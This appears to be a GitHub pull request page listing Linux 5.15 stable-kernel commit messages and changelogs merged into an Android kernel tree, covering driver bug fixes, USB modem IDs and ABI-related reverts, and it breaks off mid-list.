Color #69
Open
Color #69
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
commit 3820c4fdc247b6f0a4162733bdb8ddf8f2e8a1e4 upstream. Trying to stop a queue which hasn't been allocated will result in a warning due to calling mutex_lock() against an uninitialized mutex. DEBUG_LOCKS_WARN_ON(lock->magic != lock) WARNING: CPU: 4 PID: 104150 at kernel/locking/mutex.c:579 Call trace: RIP: 0010:__mutex_lock+0x1173/0x14a0 nvme_rdma_stop_queue+0x1b/0xa0 [nvme_rdma] nvme_rdma_teardown_io_queues.part.0+0xb0/0x1d0 [nvme_rdma] nvme_rdma_delete_ctrl+0x50/0x100 [nvme_rdma] nvme_do_delete_ctrl+0x149/0x158 [nvme_core] Signed-off-by: Maurizio Lombardi <[email protected]> Reviewed-by: Sagi Grimberg <[email protected]> Tested-by: Yi Zhang <[email protected]> Signed-off-by: Keith Busch <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 6a7be48e9bd18d309ba25c223a27790ad1bf0fa3 upstream. Add support for the following Telit LE910C4-WWX composition: 0x1035: TTY, TTY, ECM T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 5 Spd=480 MxCh= 0 D: Ver= 2.00 Cls=ef(misc ) Sub=02 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=1bc7 ProdID=1035 Rev=00.00 S: Manufacturer=Telit S: Product=LE910C4-WWX S: SerialNumber=e1b117c7 C: #Ifs= 4 Cfg#= 1 Atr=e0 MxPwr=500mA I: If#= 0 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=option E: Ad=01(O) Atr=02(Bulk) MxPS= 512 Ivl=0ms E: Ad=81(I) Atr=03(Int.) MxPS= 64 Ivl=2ms E: Ad=82(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms I: If#= 1 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=fe Prot=ff Driver=option E: Ad=02(O) Atr=02(Bulk) MxPS= 512 Ivl=0ms E: Ad=83(I) Atr=03(Int.) MxPS= 64 Ivl=2ms E: Ad=84(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms I: If#= 2 Alt= 0 #EPs= 1 Cls=02(commc) Sub=06 Prot=00 Driver=cdc_ether E: Ad=85(I) Atr=03(Int.) MxPS= 64 Ivl=2ms I: If#= 3 Alt= 1 #EPs= 2 Cls=0a(data ) Sub=00 Prot=00 Driver=cdc_ether E: Ad=03(O) Atr=02(Bulk) MxPS= 512 Ivl=0ms E: Ad=86(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms Signed-off-by: Fabio Porcedda <[email protected]> Cc: [email protected] Reviewed-by: Daniele Palmas <[email protected]> Signed-off-by: Johan Hovold <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 064f6e2ba9eb59b2c87b866e1e968e79ccedf9dd upstream. Following a firmware update of the modem, the interface for the AT command port changed, so add it back. T: Bus=08 Lev=01 Prnt=01 Port=01 Cnt=02 Dev#= 2 Spd=5000 MxCh= 0 D: Ver= 3.20 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 9 #Cfgs= 1 P: Vendor=1199 ProdID=90d3 Rev=00.06 S: Manufacturer=Sierra Wireless, Incorporated S: Product=Sierra Wireless EM9191 S: SerialNumber=xxxxxxxxxxxxxxxx C: #Ifs= 4 Cfg#= 1 Atr=a0 MxPwr=896mA I: If#=0x0 Alt= 0 #EPs= 1 Cls=02(commc) Sub=0e Prot=00 Driver=cdc_mbim I: If#=0x1 Alt= 1 #EPs= 2 Cls=0a(data ) Sub=00 Prot=02 Driver=cdc_mbim I: If#=0x3 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=40 Driver=(none) I: If#=0x4 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=30 Driver=option Signed-off-by: Benoît Monin <[email protected]> Cc: [email protected] Signed-off-by: Johan Hovold <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 52480e1f1a259c93d749ba3961af0bffedfe7a7a upstream. Update the USB serial option driver support for the Fibocom FM101R-GL LTE modules as there are actually several different variants. - VID:PID 413C:8213, FM101R-GL are laptop M.2 cards (with MBIM interfaces for Linux) - VID:PID 413C:8215, FM101R-GL ESIM are laptop M.2 cards (with MBIM interface for Linux) 0x8213: mbim, tty 0x8215: mbim, tty T: Bus=04 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 2 Spd=5000 MxCh= 0 D: Ver= 3.20 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 9 #Cfgs= 1 P: Vendor=413c ProdID=8213 Rev= 5.04 S: Manufacturer=Fibocom Wireless Inc. S: Product=Fibocom FM101-GL Module S: SerialNumber=a3b7cbf0 C:* #Ifs= 3 Cfg#= 1 Atr=a0 MxPwr=896mA A: FirstIf#= 0 IfCount= 2 Cls=02(comm.) Sub=0e Prot=00 I:* If#= 0 Alt= 0 #EPs= 1 Cls=02(comm.) Sub=0e Prot=00 Driver=cdc_mbim E: Ad=81(I) Atr=03(Int.) MxPS= 64 Ivl=32ms I: If#= 1 Alt= 0 #EPs= 0 Cls=0a(data ) Sub=00 Prot=02 Driver=cdc_mbim I:* If#= 1 Alt= 1 #EPs= 2 Cls=0a(data ) Sub=00 Prot=02 Driver=cdc_mbim E: Ad=8e(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms E: Ad=0f(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms I:* If#= 2 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=00 Prot=40 Driver=(none) E: Ad=83(I) Atr=03(Int.) MxPS= 10 Ivl=32ms E: Ad=82(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms E: Ad=01(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms T: Bus=04 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 3 Spd=5000 MxCh= 0 D: Ver= 3.20 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 9 #Cfgs= 1 P: Vendor=413c ProdID=8215 Rev= 5.04 S: Manufacturer=Fibocom Wireless Inc. S: Product=Fibocom FM101-GL Module S: SerialNumber=a3b7cbf0 C:* #Ifs= 3 Cfg#= 1 Atr=a0 MxPwr=896mA A: FirstIf#= 0 IfCount= 2 Cls=02(comm.) Sub=0e Prot=00 I:* If#= 0 Alt= 0 #EPs= 1 Cls=02(comm.) Sub=0e Prot=00 Driver=cdc_mbim E: Ad=81(I) Atr=03(Int.) MxPS= 64 Ivl=32ms I: If#= 1 Alt= 0 #EPs= 0 Cls=0a(data ) Sub=00 Prot=02 Driver=cdc_mbim I:* If#= 1 Alt= 1 #EPs= 2 Cls=0a(data ) Sub=00 Prot=02 Driver=cdc_mbim E: Ad=8e(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms E: Ad=0f(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms I:* If#= 2 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=00 Prot=40 Driver=(none) E: Ad=83(I) Atr=03(Int.) MxPS= 10 Ivl=32ms E: Ad=82(I) Atr=02(Bulk) MxPS=1024 Ivl=0ms E: Ad=01(O) Atr=02(Bulk) MxPS=1024 Ivl=0ms Signed-off-by: Puliang Lu <[email protected]> Cc: [email protected] Signed-off-by: Johan Hovold <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 32671e3799ca2e4590773fd0e63aaa4229e50c06 upstream. Because group consistency is non-atomic between parent (filedesc) and children (inherited) events, it is possible for PERF_FORMAT_GROUP read() to try and sum non-matching counter groups -- with non-sensical results. Add group_generation to distinguish the case where a parent group removes and adds an event and thus has the same number, but a different configuration of events as inherited groups. This became a problem when commit fa8c269 ("perf/core: Invert perf_read_group() loops") flipped the order of child_list and sibling_list. Previously it would iterate the group (sibling_list) first, and for each sibling traverse the child_list. In this order, only the group composition of the parent is relevant. By flipping the order the group composition of the child (inherited) events becomes an issue and the mis-match in group composition becomes evident. That said; even prior to this commit, while reading of a group that is not equally inherited was not broken, it still made no sense. (Ab)use ECHILD as error return to indicate issues with child process group composition. Fixes: fa8c269 ("perf/core: Invert perf_read_group() loops") Reported-by: Budimir Markovic <[email protected]> Signed-off-by: Peter Zijlstra (Intel) <[email protected]> Link: https://lkml.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit c1ae1c59c8c6e0b66a718308c623e0cb394dab6b upstream. Since the fixed commits both zdev->iommu_bitmap and zdev->lazy_bitmap are allocated as vzalloc(zdev->iommu_pages / 8). The problem is that zdev->iommu_bitmap is a pointer to unsigned long but the above only yields an allocation that is a multiple of sizeof(unsigned long) which is 8 on s390x if the number of IOMMU pages is a multiple of 64. This in turn is the case only if the effective IOMMU aperture is a multiple of 64 * 4K = 256K. This is usually the case and so didn't cause visible issues since both the virt_to_phys(high_memory) reduced limit and hardware limits use nice numbers. Under KVM, and in particular with QEMU limiting the IOMMU aperture to the vfio DMA limit (default 65535), it is possible for the reported aperture not to be a multiple of 256K however. In this case we end up with an iommu_bitmap whose allocation is not a multiple of 8 causing bitmap operations to access it out of bounds. Sadly we can't just fix this in the obvious way and use bitmap_zalloc() because for large RAM systems (tested on 8 TiB) the zdev->iommu_bitmap grows too large for kmalloc(). So add our own bitmap_vzalloc() wrapper. This might be a candidate for common code, but this area of code will be replaced by the upcoming conversion to use the common code DMA API on s390 so just add a local routine. Fixes: 2245932 ("s390/pci: use virtual memory for iommu bitmap") Fixes: 13954fd ("s390/pci_dma: improve lazy flush for unmap") Cc: [email protected] Reviewed-by: Matthew Rosato <[email protected]> Signed-off-by: Niklas Schnelle <[email protected]> Signed-off-by: Vasily Gorbik <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 03b80ff8023adae6780e491f66e932df8165e3a0 upstream. If name_show() is non unique, this test will try to install a kprobe on this function which should fail returning EADDRNOTAVAIL. On kernel where name_show() is not unique, this test is skipped. Link: https://lore.kernel.org/all/[email protected]/ Cc: [email protected] Signed-off-by: Francis Laniel <[email protected]> Acked-by: Masami Hiramatsu (Google) <[email protected]> Signed-off-by: Masami Hiramatsu (Google) <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 63e8b94ad1840f02462633abdb363397f56bc642 upstream. When dma_set_coherent_mask() fails, sch->lock has not been freed, which is allocated in css_sch_create_locks(), leading to a memleak. Fixes: 4520a91 ("s390/cio: use dma helpers for setting masks") Signed-off-by: Dinghao Liu <[email protected]> Message-Id: <[email protected]> Link: https://lore.kernel.org/linux-s390/[email protected]/ Reviewed-by: Halil Pasic <[email protected]> Reviewed-by: Peter Oberparleiter <[email protected]> Signed-off-by: Vasily Gorbik <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
…ration fails commit fe0e04cf66a12ffe6d1b43725ddaabd5599d024f upstream. If platform_profile_register() fails, the driver does not propagate the error, but instead probes successfully. This means when the driver unbinds, the a warning might be issued by platform_profile_remove(). Fix this by propagating the error back to the caller of surface_platform_profile_probe(). Compile-tested only. Fixes: b78b498 ("platform/surface: Add platform profile driver") Signed-off-by: Armin Wolf <[email protected]> Reviewed-by: Maximilian Luz <[email protected]> Tested-by: Maximilian Luz <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Hans de Goede <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit f37cc2fc277b371fc491890afb7d8a26e36bb3a1 upstream.
Older Asus laptops change the backlight level themselves and then send
WMI events with different codes for different backlight levels.
The asus-wmi.c code maps the entire range of codes reported on
brightness down keypresses to an internal ASUS_WMI_BRN_DOWN code:
define NOTIFY_BRNUP_MIN 0x11
define NOTIFY_BRNUP_MAX 0x1f
define NOTIFY_BRNDOWN_MIN 0x20
define NOTIFY_BRNDOWN_MAX 0x2e
if (code >= NOTIFY_BRNUP_MIN && code <= NOTIFY_BRNUP_MAX)
code = ASUS_WMI_BRN_UP;
else if (code >= NOTIFY_BRNDOWN_MIN && code <= NOTIFY_BRNDOWN_MAX)
code = ASUS_WMI_BRN_DOWN;
Before this commit all the NOTIFY_BRNDOWN_MIN - NOTIFY_BRNDOWN_MAX
aka 0x20 - 0x2e events were mapped to 0x20.
This mapping is causing issues on new laptop models which actually
send 0x2b events for printscreen presses and 0x2c events for
capslock presses, which get translated into spurious brightness-down
presses.
The plan is disable the 0x11-0x2e special mapping on laptops
where asus-wmi does not register a backlight-device to avoid
the spurious brightness-down keypresses. New laptops always send
0x2e for brightness-down presses, change the special internal
ASUS_WMI_BRN_DOWN value from 0x20 to 0x2e to match this in
preparation for fixing the spurious brightness-down presses.
This change does not have any functional impact since all
of 0x20 - 0x2e is mapped to ASUS_WMI_BRN_DOWN first and only
then checked against the keymap code and the new 0x2e
value is still in the 0x20 - 0x2e range.
Reported-by: James John <[email protected]>
Closes: https://lore.kernel.org/platform-driver-x86/[email protected]/
Closes: https://bbs.archlinux.org/viewtopic.php?pid=2123716
Signed-off-by: Hans de Goede <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit 235985d1763f7aba92c1c64e5f5aaec26c2c9b18 upstream. Newer Asus laptops send the following new WMI event codes when some of the F1 - F12 "media" hotkeys are pressed: 0x2a Screen Capture 0x2b PrintScreen 0x2c CapsLock Map 0x2a to KEY_SELECTIVE_SCREENSHOT mirroring how similar hotkeys are mapped on other laptops. PrintScreem and CapsLock are also reported as normal PS/2 keyboard events, map these event codes to KE_IGNORE to avoid "Unknown key code 0x%x\n" log messages. Reported-by: James John <[email protected]> Closes: https://lore.kernel.org/platform-driver-x86/[email protected]/ Closes: https://bbs.archlinux.org/viewtopic.php?pid=2123716 Signed-off-by: Hans de Goede <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
commit fc363413ef8ea842ae7a99e3caf5465dafdd3a49 upstream. We found a glitch when configuring the pad as output high. To avoid this glitch, move the data value setting before direction config in the function vf610_gpio_direction_output(). Fixes: 659d8a6 ("gpio: vf610: add imx7ulp support") Signed-off-by: Haibo Chen <[email protected]> [Bartosz: tweak the commit message] Signed-off-by: Bartosz Golaszewski <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
[ Upstream commit aa6464edbd51af4a2f8db43df866a7642b244b5f ] Free the "priv" pointer before returning the error code. Fixes: 90eb6b5 ("ASoC: pxa-ssp: add support for an external clock in devicetree") Signed-off-by: Dan Carpenter <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Mark Brown <[email protected]> Signed-off-by: Sasha Levin <[email protected]>
commit c53aab20762255ee03e65dd66b3cba3887ad39d1 upstream.
If CONFIG_PM is not set (e.g. m68k/allmodconfig):
drivers/tty/serial/8250/8250_omap.c:169:13: error: ‘uart_write’ defined but not used [-Werror=unused-function]
169 | static void uart_write(struct omap8250_priv *priv, u32 reg, u32 val)
| ^~~~~~~~~~
Fix tis by moving uart_write() inside the existing section protected
by #ifdef CONFIG_PM.
Reported-by: [email protected]
Link: http://kisskb.ellerman.id.au/kisskb/buildresult/14925095/
Fixes: 398cecc24846e867 ("serial: 8250: omap: Fix imprecise external abort for omap_8250_pm()")
Signed-off-by: Geert Uytterhoeven <[email protected]>
Reviewed-by: Tony Lindgren <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
[ Upstream commit 719606154c7033c068a5d4c1dc5f9163b814b3c8 ]
Commit d644e0d79829 ("phy: mapphone-mdm6600: Fix PM error handling in
phy_mdm6600_probe") caused a regression where we now unconditionally
disable runtime PM at the end of the probe while it is only needed on
errors.
Cc: Ivaylo Dimitrov <[email protected]>
Cc: Merlijn Wajer <[email protected]>
Cc: Miaoqian Lin <[email protected]>
Cc: Pavel Machek <[email protected]>
Reviewed-by: Sebastian Reichel <[email protected]>
Fixes: d644e0d79829 ("phy: mapphone-mdm6600: Fix PM error handling in phy_mdm6600_probe")
Signed-off-by: Tony Lindgren <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Vinod Koul <[email protected]>
Signed-off-by: Sasha Levin <[email protected]>
[ Upstream commit b99e0ba9633af51638e5ee1668da2e33620c134f ] Otherwise we will get an underflow on remove. Cc: Ivaylo Dimitrov <[email protected]> Cc: Merlijn Wajer <[email protected]> Cc: Pavel Machek <[email protected]> Cc: Sebastian Reichel <[email protected]> Fixes: f7f50b2 ("phy: mapphone-mdm6600: Add runtime PM support for n_gsm on USB suspend") Signed-off-by: Tony Lindgren <[email protected]> Reviewed-by: Sebastian Reichel <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Vinod Koul <[email protected]> Signed-off-by: Sasha Levin <[email protected]>
[ Upstream commit 3b384cc74b00b5ac21d18e4c1efc3c1da5300971 ] Looks like the driver sleep pins configuration is unusable. Adding the sleep pins causes the usb phy to not respond. We need to use the default pins in probe, and only set sleep pins at phy_mdm6600_device_power_off(). As the modem can also be booted to a serial port mode for firmware flashing, let's make the pin changes limited to probe and remove. For probe, we get the default pins automatically. We only need to set the sleep pins in phy_mdm6600_device_power_off() to prevent the modem from waking up because the gpio line glitches. If it turns out that we need a separate state for phy_mdm6600_power_on() and phy_mdm6600_power_off(), we can use the pinctrl idle state. Cc: Ivaylo Dimitrov <[email protected]> Cc: Merlijn Wajer <[email protected]> Cc: Pavel Machek <[email protected]> Cc: Sebastian Reichel <[email protected]> Fixes: 2ad2af0 ("phy: mapphone-mdm6600: Improve phy related runtime PM calls") Signed-off-by: Tony Lindgren <[email protected]> Reviewed-by: Sebastian Reichel <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Vinod Koul <[email protected]> Signed-off-by: Sasha Levin <[email protected]>
commit 18f547f3fc074500ab5d419cf482240324e73a7e upstream. When accessing hdev->name, the actual string length should prevail Reported-by: [email protected] Fixes: dcda165706b9 ("Bluetooth: hci_core: Fix build warnings") Signed-off-by: Edward AD <[email protected]> Signed-off-by: Luiz Augusto von Dentz <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
… name commit cb3871b1cd135a6662b732fbc6b3db4afcdb4a64 upstream. The code pattern of memcpy(dst, src, strlen(src)) is almost always wrong. In this case it is wrong because it leaves memory uninitialized if it is less than sizeof(ni->name), and overflows ni->name when longer. Normally strtomem_pad() could be used here, but since ni->name is a trailing array in struct hci_mon_new_index, compilers that don't support -fstrict-flex-arrays=3 can't tell how large this array is via __builtin_object_size(). Instead, open-code the helper and use sizeof() since it will work correctly. Additionally mark ni->name as __nonstring since it appears to not be a %NUL terminated C string. Cc: Luiz Augusto von Dentz <[email protected]> Cc: Edward AD <[email protected]> Cc: Marcel Holtmann <[email protected]> Cc: Johan Hedberg <[email protected]> Cc: "David S. Miller" <[email protected]> Cc: Eric Dumazet <[email protected]> Cc: Jakub Kicinski <[email protected]> Cc: Paolo Abeni <[email protected]> Cc: [email protected] Cc: [email protected] Fixes: 18f547f3fc07 ("Bluetooth: hci_sock: fix slab oob read in create_monitor_event") Link: https://lore.kernel.org/lkml/202310110908.F2639D3276@keescook/ Signed-off-by: Kees Cook <[email protected]> Signed-off-by: Luiz Augusto von Dentz <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
[ Upstream commit cc9b364bb1d58d3dae270c7a931a8cc717dc2b3b ] There are race conditions that may lead to inet6_dev refcount underflow in xfrm6_dst_destroy() and rt6_uncached_list_flush_dev(). One of the refcount underflow bugs is shown below: (cpu 1) | (cpu 2) xfrm6_dst_destroy() | ... | in6_dev_put() | | rt6_uncached_list_flush_dev() ... | ... | in6_dev_put() rt6_uncached_list_del() | ... ... | xfrm6_dst_destroy() calls rt6_uncached_list_del() after in6_dev_put(), so rt6_uncached_list_flush_dev() has a chance to call in6_dev_put() again for the same inet6_dev. Fix it by moving in6_dev_put() after rt6_uncached_list_del() in xfrm6_dst_destroy(). Fixes: 510c321 ("xfrm: reuse uncached_list to track xdsts") Signed-off-by: Zhang Changzhong <[email protected]> Reviewed-by: Xin Long <[email protected]> Signed-off-by: Steffen Klassert <[email protected]> Signed-off-by: Sasha Levin <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
Link: https://lore.kernel.org/r/[email protected] Tested-by: SeongJae Park <[email protected]> Tested-by: Ricardo B. Marliere <[email protected]> Tested-by: Allen Pais <[email protected]> Tested-by: Florian Fainelli <[email protected]> Tested-by: Sudip Mukherjee <[email protected]> Link: https://lore.kernel.org/r/[email protected] Tested-by: Florian Fainelli <[email protected]> Tested-by: Slade Watkins <[email protected]> Tested-by: Allen Pais <[email protected]> Tested-by: SeongJae Park <[email protected]> Tested-by: Linux Kernel Functional Testing <[email protected]> Tested-by: Harshit Mogalapalli <[email protected]> Tested-by: Ron Economos <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
Changes in 5.15.135
spi: zynqmp-gqspi: Convert to platform remove callback returning void
spi: zynqmp-gqspi: fix clock imbalance on probe failure
ASoC: soc-utils: Export snd_soc_dai_is_dummy() symbol
ASoC: tegra: Fix redundant PLLA and PLLA_OUT0 updates
NFS: Cleanup unused rpc_clnt variable
NFS: rename nfs_client_kset to nfs_kset
NFSv4: Fix a state manager thread deadlock regression
ring-buffer: remove obsolete comment for free_buffer_page()
ring-buffer: Fix bytes info in per_cpu buffer stats
arm64: Avoid repeated AA64MMFR1_EL1 register read on pagefault path
iommu/arm-smmu-v3: Set TTL invalidation hint better
iommu/arm-smmu-v3: Avoid constructing invalid range commands
rbd: move rbd_dev_refresh() definition
rbd: decouple header read-in from updating rbd_dev->header
rbd: decouple parent info read-in from updating rbd_dev
rbd: take header_rwsem in rbd_dev_refresh() only when updating
block: fix use-after-free of q->q_usage_counter
Revert "clk: imx: pll14xx: dynamically configure PLL for 393216000/361267200Hz"
scsi: zfcp: Fix a double put in zfcp_port_enqueue()
vringh: don't use vringh_kiov_advance() in vringh_iov_xfer()
qed/red_ll2: Fix undefined behavior bug in struct qed_ll2_info
wifi: mwifiex: Fix tlv_buf_left calculation
net: replace calls to sock->ops->connect() with kernel_connect()
net: prevent rewrite of msg_name in sock_sendmsg()
drm/amd: Fix detection of _PR3 on the PCIe root port
arm64: Add Cortex-A520 CPU part definition
HID: sony: Fix a potential memory leak in sony_probe()
ubi: Refuse attaching if mtd's erasesize is 0
wifi: iwlwifi: dbg_ini: fix structure packing
iwlwifi: avoid void pointer arithmetic
wifi: iwlwifi: mvm: Fix a memory corruption issue
wifi: mwifiex: Fix oob check condition in mwifiex_process_rx_packet
bpf: Fix tr dereferencing
drivers/net: process the result of hdlc_open() and add call of hdlc_close() in uhdlc_close()
wifi: mt76: mt76x02: fix MT76x0 external LNA gain handling
regmap: rbtree: Fix wrong register marked as in-cache when creating new node
ima: Finish deprecation of IMA_TRUSTED_KEYRING Kconfig
scsi: target: core: Fix deadlock due to recursive locking
ima: rework CONFIG_IMA dependency block
NFSv4: Fix a nfs4_state_manager() race
bpf, sockmap: Reject sk_msg egress redirects to non-TCP sockets
modpost: add missing else to the "of" check
net: fix possible store tearing in neigh_periodic_work()
ipv4, ipv6: Fix handling of transhdrlen in __ip{,6}_append_data()
ptp: ocp: Fix error handling in ptp_ocp_device_init
net: dsa: mv88e6xxx: Avoid EEPROM timeout when EEPROM is absent
net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg
net: nfc: llcp: Add lock when modifying device list
net: ethernet: ti: am65-cpsw: Fix error code in am65_cpsw_nuss_init_tx_chns()
ibmveth: Remove condition to recompute TCP header checksum.
netfilter: handle the connecting collision properly in nf_conntrack_proto_sctp
netfilter: nf_tables: nft_set_rbtree: fix spurious insertion failure
ipv4: Set offload_failed flag in fibmatch results
net: stmmac: dwmac-stm32: fix resume on STM32 MCU
tipc: fix a potential deadlock on &tx->lock
tcp: fix quick-ack counting to count actual ACKs of new data
tcp: fix delayed ACKs for MSS boundary condition
sctp: update transport state when processing a dupcook packet
sctp: update hb timer immediately after users change hb_interval
HID: sony: remove duplicate NULL check before calling usb_free_urb()
HID: intel-ish-hid: ipc: Disable and reenable ACPI GPE bit
dm zoned: free dmz->ddev array in dmz_put_zoned_devices
RDMA/core: Require admin capabilities to set system parameters
of: dynamic: Fix potential memory leak in of_changeset_action()
IB/mlx4: Fix the size of a buffer in add_port_entries()
gpio: aspeed: fix the GPIO number passed to pinctrl_gpio_set_config()
gpio: pxa: disable pinctrl calls for MMP_GPIO
RDMA/cma: Initialize ib_sa_multicast structure to 0 when join
RDMA/cma: Fix truncation compilation warning in make_cma_ports
RDMA/uverbs: Fix typo of sizeof argument
RDMA/siw: Fix connection failure handling
RDMA/mlx5: Fix NULL string error
ksmbd: fix uaf in smb20_oplock_break_ack
parisc: Restore __ldcw_align for PA-RISC 2.0 processors
xen/events: replace evtchn_rwlock with RCU
Linux 5.15.135
Change-Id: I568f0a1c698f90e58e8bef6e05e785526e46dcf4
Signed-off-by: Greg Kroah-Hartman <[email protected]>
Allow drivers to register mm_page_alloc hooks when alloc pages. This helps to get page info when alloc pages exit. Bug: 307485594 Change-Id: I6bdec48bf04a19718e49a51e52ac8d4ae64a7f86 Signed-off-by: Qinglin Li <[email protected]>
1 function symbol(s) added 'int __traceiter_mm_page_alloc(void*, struct page*, unsigned int, gfp_t, int)' 1 variable symbol(s) added 'struct tracepoint __tracepoint_mm_page_alloc' Bug: 307485594 Change-Id: I1393146b905a27875e52ff925da1a94e2d6d2e45 Signed-off-by: Qinglin Li <[email protected]>
…ntrack_proto_sctp" This reverts commit 88497f7 which is commit 8e56b063c86569e51eed1c5681ce6361fa97fc7a uptream. It breaks the Android ABI so revert it for now, if it is needed in the future, it can be brought back in an ABI-safe way. Bug: 161946584 Change-Id: Ia03ea49365e6ce063194738b22f77d2a403ea3a4 Signed-off-by: Greg Kroah-Hartman <[email protected]>
…ing void" This reverts commit e514f89 which is commit 3ffefa1d9c9eba60c7f8b4a9ce2df3e4c7f4a88e upstream. It breaks the build due to the 'remove_new' callback not being present. Revert it in order to fix the build in the android13-5.15 tree. Change-Id: I22d25ef61b65ccf0f14a71f4e2a76c3f78486286 Signed-off-by: Greg Kroah-Hartman <[email protected]>
Changes in 5.15.136 iommu/vt-d: Avoid memory allocation in iommu_suspend() scsi: core: Use a structure member to track the SCSI command submitter scsi: core: Rename scsi_mq_done() into scsi_done() and export it scsi: ib_srp: Call scsi_done() directly RDMA/srp: Do not call scsi_done() from srp_abort() RDMA/cxgb4: Check skb value for failure to allocate perf/arm-cmn: Fix the unhandled overflow status of counter 4 to 7 of: overlay: Reorder struct fragment fields kerneldoc platform/x86: think-lmi: Fix reference leak platform/x86: hp-wmi:: Mark driver struct with __refdata to prevent section mismatch warning lib/test_meminit: fix off-by-one error in test_pages() HID: logitech-hidpp: Fix kernel crash on receiver USB disconnect quota: Fix slow quotaoff net: prevent address rewrite in kernel_bind() ALSA: usb-audio: Fix microphone sound on Opencomm2 Headset KEYS: trusted: allow use of kernel RNG for key material KEYS: trusted: Remove redundant static calls usage drm/msm/dp: do not reinitialize phy unless retry during link training drm/msm/dsi: skip the wait for video mode done if not applicable drm/msm/dsi: fix irq_of_parse_and_map() error checking drm/msm/dpu: change _dpu_plane_calc_bw() to use u64 to avoid overflow ravb: Fix up dma_free_coherent() call in ravb_remove() ravb: Fix use-after-free issue in ravb_tx_timeout_work() ieee802154: ca8210: Fix a potential UAF in ca8210_probe mlxsw: fix mlxsw_sp2_nve_vxlan_learning_set() return type eth: remove copies of the NAPI_POLL_WEIGHT define xen-netback: use default TX queue size for vifs riscv, bpf: Factor out emit_call for kernel and bpf context riscv, bpf: Sign-extend return values drm/vmwgfx: fix typo of sizeof argument bpf: Fix verifier log for async callback return values net: macsec: indicate next pn update when offloading net: phy: mscc: macsec: reject PN update requests ixgbe: fix crash with empty VF macvlan list net/mlx5e: Again mutually exclude RX-FCS and RX-port-timestamp net: nfc: fix races in nfc_llcp_sock_get() and nfc_llcp_sock_get_sn() net/smc: Fix pos miscalculation in statistics pinctrl: renesas: rzn1: Enable missing PINMUX nfc: nci: assert requested protocol is valid workqueue: Override implicit ordered attribute in workqueue_apply_unbound_cpumask() net: add sysctl accept_ra_min_rtr_lft net: change accept_ra_min_rtr_lft to affect all RA lifetimes net: release reference to inet6_dev pointer media: mtk-jpeg: Fix use after free bug due to uncanceled work dmaengine: stm32-mdma: abort resume if no ongoing transfer xhci: Keep interrupt disabled in initialization until host is running. usb: xhci: xhci-ring: Use sysdev for mapping bounce buffer net: usb: dm9601: fix uninitialized variable use in dm9601_mdio_read usb: dwc3: Soft reset phy on probe for host usb: cdns3: Modify the return value of cdns_set_active () to void when CONFIG_PM_SLEEP is disabled usb: musb: Get the musb_qh poniter after musb_giveback usb: musb: Modify the "HWVers" register address iio: pressure: bmp280: Fix NULL pointer exception iio: pressure: dps310: Adjust Timeout Settings iio: pressure: ms5611: ms5611_prom_is_valid false negative bug drm/amdgpu: add missing NULL check drm/amd/display: Don't set dpms_off for seamless boot ACPI: resource: Skip IRQ override on ASUS ExpertBook B1402CBA x86/cpu: Fix AMD erratum #1485 on Zen4-based CPUs mcb: remove is_added flag from mcb_device struct thunderbolt: Workaround an IOMMU fault on certain systems with Intel Maple Ridge thunderbolt: Check that lane 1 is in CL0 before enabling lane bonding libceph: use kernel_connect() ceph: fix incorrect revoked caps assert in ceph_fill_file_size() ceph: fix type promotion bug on 32bit systems Input: powermate - fix use-after-free in powermate_config_complete Input: psmouse - fix fast_reconnect function for PS/2 mode Input: xpad - add PXN V900 support Input: i8042 - add Fujitsu Lifebook E5411 to i8042 quirk table Input: goodix - ensure int GPIO is in input for gpio_count == 